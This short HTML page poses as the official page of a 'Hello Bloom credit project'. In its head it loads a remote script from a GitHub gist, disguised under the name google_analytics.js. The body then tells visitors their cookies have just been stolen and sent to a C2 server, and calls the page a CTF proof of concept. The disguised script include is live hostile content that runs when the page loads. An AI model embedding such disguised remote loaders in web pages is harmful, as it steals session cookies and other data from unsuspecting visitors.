<head> <title>The Official Bloom Github Page</title>
<script src='https://gist.githubusercontent.com/hello-bloom/c2be607c5f1dc4b3edbd54a7df01d456/raw/eefebbdf44448f47e3b3c1b7999014d8f65d0361/google_analytics.js'> </script>
</head>
<body>
<p> This is the main page for the Hello Bloom credit project. Please refer to this page for all official updates....</p>
<h1> Congrats, I just stole your cookies</h1>
<p>This should serve as a proof of concept for the CTF. A number of Javascript-based payloads are currently executing and exfiltrating data back to our C2 server. Next time, use NoScript. </p>
<p>Kind Regards, <br/>AHJ</p>
</body>
